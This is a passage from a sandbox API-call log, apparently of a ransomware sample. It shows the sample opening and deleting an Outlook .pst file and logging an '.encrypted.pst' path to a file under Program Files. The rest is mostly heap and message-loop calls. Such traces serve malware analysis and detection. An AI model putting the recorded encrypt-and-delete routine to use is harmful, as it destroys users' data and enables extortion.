wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.790] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.790] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.790] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.790] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.790] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.790] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.791] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0036.791] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.791] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0036.791] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.791] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0036.791] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.791] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.792] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.792] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0036.792] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.792] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.792] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.792] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst", lpFilePart=0x0) returned 0x4c [0036.792] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x15a1eec0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0x7c2100 [0036.793] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst")) returned 1 [0036.795] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x15a1eec0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0 [0036.795] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0036.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0036.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0036.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8600 | out: hHeap=0x770000) returned 1 [0036.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0036.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0036.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0036.796] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0036.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0036.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0036.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5e8 [0036.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0036.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0036.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0036.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0036.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd18 [0036.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0036.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0036.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0036.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0036.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0036.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0036.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0036.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0036.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="st", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pst", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pst", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0036.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0036.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0036.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0036.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0036.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0036.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0036.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.797] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0036.797] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.797] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0036.797] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.797] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0036.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0036.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0036.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.797] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0036.797] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x1f98, lpOverlapped=0x0) returned 1 [0036.797] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0036.798] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x1f98, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.798] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0036.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0010 | out: hHeap=0x770000) returned 1 [0036.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0036.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0036.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.encrypted.pst\r\n", cchWideChar=89, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 89 [0036.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x59) returned 0x87aa40 [0036.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.encrypted.pst\r\n", cchWideChar=89, lpMultiByteStr=0x87aa40, cbMultiByte=89, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.encrypted.pst\r\n", lpUsedDefaultChar=0x0) returned 89 [0036.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0036.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0036.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0036.798] WriteFile (in: hFile=0x140, lpBuffer=0x87a9d8*, nNumberOfBytesToWrite=0x58, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87a9d8*, lpNumberOfBytesWritten=0x6aee3c*=0x58, lpOverlapped=0x0) returned 1 [0036.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0036.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.798] CloseHandle (hObject=0x140) returned 1 [0036.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0036.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0036.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0036.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0036.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0036.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0036.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0036.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0036.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0036.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0036.799] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0036.799] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0036.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0036.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0036.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0036.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0036.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0036.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0036.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0036.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0036.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0036.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0036.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0036.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0036.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0036.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0036.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0036.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0036.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0036.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0036.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0036.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0036.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0036.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0036.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0036.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0036.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0036.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0036.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0036.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0036.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0036.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0036.801] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0036.801] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.801] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0036.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0036.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0036.801] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0036.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0036.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0036.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af3e8 [0036.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0036.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0036.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0036.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0036.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0036.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8c8 [0036.801] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0036.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0036.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0036.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0036.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0036.802] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0036.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0036.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0036.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0036.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0036.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0036.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0036.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0036.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0036.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0036.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.802] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0036.802] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0036.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0036.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0036.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0036.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0036.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0036.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0036.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0036.803] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0036.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0036.803] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0036.803] HeapFree (in: hHeap=0x770000, 